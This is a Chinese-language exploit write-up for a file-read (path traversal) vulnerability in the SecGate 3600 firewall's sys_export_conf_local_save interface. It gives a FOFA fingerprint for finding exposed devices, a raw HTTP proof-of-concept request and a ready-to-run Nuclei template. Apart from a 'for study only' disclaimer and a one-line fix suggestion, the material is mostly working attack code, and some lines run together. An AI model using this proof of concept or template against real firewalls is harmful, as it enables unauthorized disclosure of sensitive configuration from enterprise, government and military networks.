免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
Ⅰ、漏洞描述
网神SecGate 3600防火墙是基于状态检测包过滤和应用级代理的复合型硬件防火墙,是专门面向大中型企业、政府、军队、高校等用户开发的新一代专业防火墙设备,支持外部攻击防范、内网安全、网络访问权限控制、网络流量监控和带宽管理、动态路由、网页内容过滤、邮件内容过滤、IP冲突检测等功能,能够有效地保证网络的安全;产品提供灵活的网络路由/桥接能力,支持策略路由,多出口链路聚合;提供多种智能分析和管理手段,支持邮件告警,支持日志审计,提供全面的网络管理监控,协助网络管理员完成网络的安全管理。
网神 SecGate 3600 防火墙 sys_export_conf_local_save 接口存在文件读取漏洞,恶意攻击者可利用此漏洞获取服务器敏感信息,从而造成信息泄露。
Ⅱ、fofa语句
fid="1Lh1LHi6yfkhiO83I59AYg==Ⅲ、漏洞复现
POC
GET /?g=sys_export_conf_local_save&file_name=../modules/system/import_export.mds HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 01、发送数据包,读取import_export.mds文件内容
Ⅳ、Nuclei-POC
id: SecGate-3600-read
info:
name: 网神 SecGate 3600 防火墙 sys_export_conf_local_save 接口存在文件读取漏洞,恶意攻击者可利用此漏洞获取服务器敏感信息,从而造成信息泄露。
author: WLF
severity: high
metadata:
fofa-query: fid="1Lh1LHi6yfkhiO83I59AYg=="
variables:
filename: "{{to_lower(rand_base(10))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
- raw:
- |
GET /?g=sys_export_conf_local_save&file_name=../modules/system/import_export.mds HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"sys_import_export")
Ⅴ、修复建议
设置访问控制策略
